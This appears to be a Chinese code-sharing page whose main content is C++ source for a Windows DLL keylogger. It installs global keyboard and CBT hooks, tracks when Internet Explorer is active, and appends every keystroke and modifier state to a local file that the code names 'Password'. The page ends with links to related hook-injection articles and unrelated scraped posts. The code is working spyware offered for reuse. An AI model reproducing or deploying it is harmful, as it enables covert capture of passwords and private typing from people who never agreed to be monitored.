动态链接库dll键盘钩子后台记录代码示例
//.header #ifndef _DLLHOOK_H_
#define _DLLHOOK_H_ #include <windows.h>
#define DLL_EXPORT_FUN __declspec(dllexport)
DLL_EXPORT_FUN BOOL InstallHook();
DLL_EXPORT_FUN BOOL UninstallHook(); #endif //.cpp #include <process.h>
#include <stdio.h>
#include "DllHook.h" #define Password "C:\\result.txt"
#define TextLength 20
#define CHARNUMBER 5
#define CAPITALNUM 10 HHOOK hHookKeyboard=0;
HHOOK hHookMsg=0;
HANDLE hDll=NULL;
char TextMsg[TextLength]={0};
bool IE_is_actived=true;
HWND hhWnd=NULL;
FILE *pfFile=NULL;
unsigned int Counter=0;
int shift = 32;
short flag=0;;
char tombnum[CHARNUMBER]={0};
enum NUM
{
SHIFT,
CONTROL,
ALT,
CAPITAL
};
static int TempArray[CHARNUMBER][CAPITAL+1];
static char text[TextLength]; void InitTable()
{ for (int i=0; i<CHARNUMBER; i++)
for (int j=0; j<CAPITALNUM+1; j++)
TempArray[i][j]=0;
} BOOL APIENTRY DllMain( HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved )
{
switch(ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
{
hDll=hModule;
hhWnd=GetActiveWindow();
MessageBox(hhWnd,"DLLKEYBOARD","提示",MB_OKCANCEL);
}
//A new process is attempting to access the DLL; one thread is assumed.
break;
case DLL_PROCESS_DETACH:
//A process is detaching from the DLL.
UninstallHook();
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
//One of the additional threads (not the first thread) of a process is detaching from the DLL.
break;
}
return TRUE;
} LRESULT CALLBACK KeyboardProc(int code,WPARAM wParam,LPARAM lParam)
{
int i, temp;
int flag_shift;
int flag_capital;
int flag_alt;
int flag_control; if (IE_is_actived)
{
if ((wParam == VK_SHIFT) || (wParam == VK_CAPITAL) || (wParam == VK_MENU) || (wParam == VK_CONTROL))
{
flag_shift = 0x8000 & GetKeyState(VK_SHIFT);
flag_capital = 0x0001 & GetKeyState(VK_CAPITAL);
flag_alt = 0x8000 & GetKeyState(VK_MENU);
flag_control = 0x8000 & GetKeyState(VK_CONTROL);
}
if (wParam!=VK_TAB && wParam!=VK_ESCAPE && wParam !=VK_LEFT && wParam!=VK_RIGHT &&
wParam!=VK_UP && wParam!=VK_DOWN && wParam!=VK_END && wParam!=VK_HOME &&
wParam!=VK_PRIOR && wParam!=VK_NEXT && wParam!=VK_INSERT && wParam!=VK_NUMLOCK &&
wParam!=VK_SCROLL && wParam!=VK_PAUSE && wParam!=VK_LWIN && wParam!=VK_RWIN &&
wParam!=VK_F1 && wParam!=VK_F2 && wParam!=VK_F3 && wParam!=VK_F4 && wParam!=VK_F5 &&
wParam!=VK_F6 && wParam!=VK_F7 && wParam!=VK_F8 && wParam!=VK_F9 &&wParam!=VK_F10 &&
wParam!=VK_F11 && wParam!=VK_F12)
{
if ((0x80000000 & lParam) == 0) //WM_KEYDOWN?
{
if (wParam>=0x41 && wParam<=0x5a)
wParam+=32; //Kisbeture konvertalas
if (wParam==VK_SHIFT || wParam==VK_CONTROL || wParam==VK_MENU || wParam==VK_CAPITAL)
{
if (wParam==VK_CAPITAL)
temp=1;
else temp=0;
TempArray[Counter][wParam-16-temp]=1;
}
tombnum[Counter] = wParam;
Counter++;
}
else //WM_KEYUP?
if (wParam==VK_SHIFT || wParam==VK_CONTROL || wParam==VK_MENU || wParam==VK_CAPITAL)
{
if (wParam==VK_CAPITAL)
temp=1;
else temp=0;
TempArray[Counter][wParam-16-temp]=2;
tombnum[Counter] = wParam;
Counter++;
}
if (Counter==CHARNUMBER)
{
pfFile = fopen(Password, "a+"); for (i=0; i<(signed)Counter; i++)
{
switch(tombnum[i])
{
case VK_DELETE :
fprintf(pfFile, "%s", "<d>");
break; case VK_RETURN :
fprintf(pfFile, "%s", "\n");
break; case VK_BACK :
fprintf(pfFile, "%s", "<b>");
break; case VK_SHIFT :
if (TempArray[i][SHIFT]==1)
fprintf(pfFile, "%s", "<sd>");
else
fprintf(pfFile, "%s", "<su>");
break; case VK_CONTROL :
if (TempArray[i][CONTROL]==1)
fprintf(pfFile, "%s", "<ctd>");
else
fprintf(pfFile, "%s", "<ctu>");
break; case VK_MENU :
if (TempArray[i][ALT]==1)
fprintf(pfFile, "%s", "<ad>");
else
fprintf(pfFile, "%s", "<au>");
break; case VK_CAPITAL :
if (TempArray[i][CAPITAL]==1)
fprintf(pfFile, "%s", "<cpd>");
else
fprintf(pfFile, "%s", "<cpu>");
break; default:
fprintf(pfFile, "%c", tombnum[i]);
break;
}
}
fclose (pfFile);
Counter=0;
InitTable();
}
}
}
return CallNextHookEx(hHookKeyboard, code, wParam, lParam);
} LRESULT CALLBACK CBTProc(int nCode, WPARAM wParam, LPARAM lParam)
{ if(nCode==HCBT_ACTIVATE)
{
GetClassName(hhWnd,TextMsg,TextLength);
{
if (TextMsg[0]=='I'&&TextMsg[1]=='E')
IE_is_actived=true;
else
IE_is_actived=false;
}
return 1;
}
else
return CallNextHookEx(hHookMsg,nCode,wParam,lParam);
} DLL_EXPORT_FUN BOOL InstallHook()
{ hHookKeyboard=SetWindowsHookEx(WH_KEYBOARD,(HOOKPROC)KeyboardProc,(HINSTANCE)hDll,(DWORD)NULL);
if (hHookKeyboard==NULL)
{
return false;
}
hHookMsg=SetWindowsHookEx(WH_CBT,(HOOKPROC)CBTProc,(HINSTANCE)hDll,(DWORD)NULL);
if (hHookMsg==NULL)
{
return false;
}
return true;
} DLL_EXPORT_FUN BOOL UninstallHook()
{ if(UnhookWindowsHookEx(hHookKeyboard)==0)
return false;
if (UnhookWindowsHookEx(hHookMsg)==0)
return false;
else
return TRUE;
}
动态链接库dll键盘钩子后台记录代码示例的更多相关文章
- C# 键盘钩子
p{ text-align:center; } blockquote > p > span{ text-align:center; font-size: 18px; color: #ff0 ...
- 2.添加键盘钩子。向进程中注入dll
学习笔记 1.首先要建立mfc的动态链接库.在def文件中放入要导出的函数名. 2.添加函数如下 //安装钩子 //HHOOK SetWindowsHookEx( // int idHook,//钩子 ...
- 基于C#实现的HOOK键盘钩子实例代码
本文所述为基于C#实现的HOOK实例,该实例可用来屏蔽系统热键.程序主要实现了安装钩子.传递钩子.卸载钩子等功能.在传递钩子中:<param name="pHookHandle&quo ...
- 通过.NET实现后台自动发送Email功能的代码示例
原文:通过.NET实现后台自动发送Email功能的代码示例 通过.NET实现后台自动发送邮件功能的代码,可以将一些基础信息放到web.config文件中进行保存: Web.config文件信息段: & ...
- hook键盘钩子 带dll
library Key; uses SysUtils, Classes, HookKey_Unit in 'HookKey_Unit.pas'; {$R *.res} exports HookOn,H ...
- Linux 动态链接库 - dll劫持
如何使用动态链接库 Linux下打开使用动态链接库需要三步(实际上和windows下基本一样):1.加载动态链接库,通过调用库函数dlopen()获得链接库的句柄,对应于windows下的 AfxLo ...
- WPF 利用键盘钩子来捕获键盘,做一些不为人知的事情...完整实例
键盘钩子是一种可以监控键盘操作的指令. 看到这句话是不是觉得其实键盘钩子可以做很多事情. 场景 当你的程序需要一个全局的快捷键时,可以考虑使用键盘钩子,如大家常用qq的截图快捷键,那么在WPF里怎么去 ...
- 编译可供C#调用的C/C++动态链接库dll文件
编译可供C#调用的C/C++动态链接库dll文件,C语言控制台应用程序,探索生成dll过程 由于项目需求,需要公司另一个团队提供相关算法支持,是用C语言编译好的dll库提供给我们进行调用. 但是拿到d ...
- VC++动态链接库(DLL)编程深入浅出(zz)
VC++动态链接库(DLL)编程深入浅出(zz) 1.概论 先来阐述一下DLL(Dynamic Linkable Library)的概念,你可以简单的把DLL看成一种仓库,它提供给你一些可以直接拿来用 ...
随机推荐
- 教你如何精通Struts:Tiles框架
Tiles框架特性和内容 Tiles框架为创建Web页面提供了一种模板机制,它能将网页的布局和内容分离.它允许先创建模板,然后在运行时动态地将内容插入到模板中.Tiles 框架建立在JSP的inclu ...
- 26个Jquery使用小技巧
下面列出了一些Jquery使用技巧.比如有禁止右键点击.隐藏搜索文本框文字.在新窗口中打开链接.检测浏览器.预加载图片.页面样式切换.所有列等高.动态控制页面字体大小.获得鼠标指针的X值Y值.验证元素 ...
- Javascript设计模式之创建对象的灵活性
传统的 /* Anim class */ var Anim = function () {}; Anim.prototype.start = function () { console.log(&qu ...
- Oracle的参数文件
参数文件的作用: 它们是在数据库实例启动时候加载的,决定了数据库的物理结构.内存.数据库的限制及系统大量的默认值.数据库的各种物理属性.指定数据库控制文件名和路径等信息,是进行数据库设计和性能调优的重 ...
- Xcode好用的插件
注释:每当Xcode升级之后,都会导致原有的Xcode插件不能使用,这是因为每个插件的Info.plist中记录了该插件兼容Xcode版本的DVTPlugInCompatibilityUUID,而每个 ...
- POCO C++库学习和分析——任务
1.任务的定义 任务虽然在Poco::Foundation库的目录中被单独划出来,其实可以被看成线程的应用,放在线程章节.首先来看一下Poco中对任务的描述: *task主要应用在GUI和Sever程 ...
- 转:C++语言的15个晦涩特性
转自 http://blog.jobbole.com/54140/ 操作符重载和检查顺序 重载,(逗号),||或者&&操作符会引起混乱,因为它打破了正常的检查规则.通常情况下,逗号操作 ...
- -bash: jps: command not found
linux安装了jdk之后,打jps命令发现找不到这个命令: -bash: jps: command not found 查看java版本java -version,正常. java version ...
- hiho_1059_string matching content length
题目大意 两个字符串strA和strB(长度最大为2100),他们中按照顺序有一些公共的子串,且公共子串的长度大于等于3,否则不认为是合法的,比如 abcdef 和 abcxcdef, 按照顺序有合法 ...
- python剑指网络篇一
#coding:utf-8 __author__ = 'similarface' #!/usr/bin/env python import socket #二进制和ASCII互转及其它进制转换 fro ...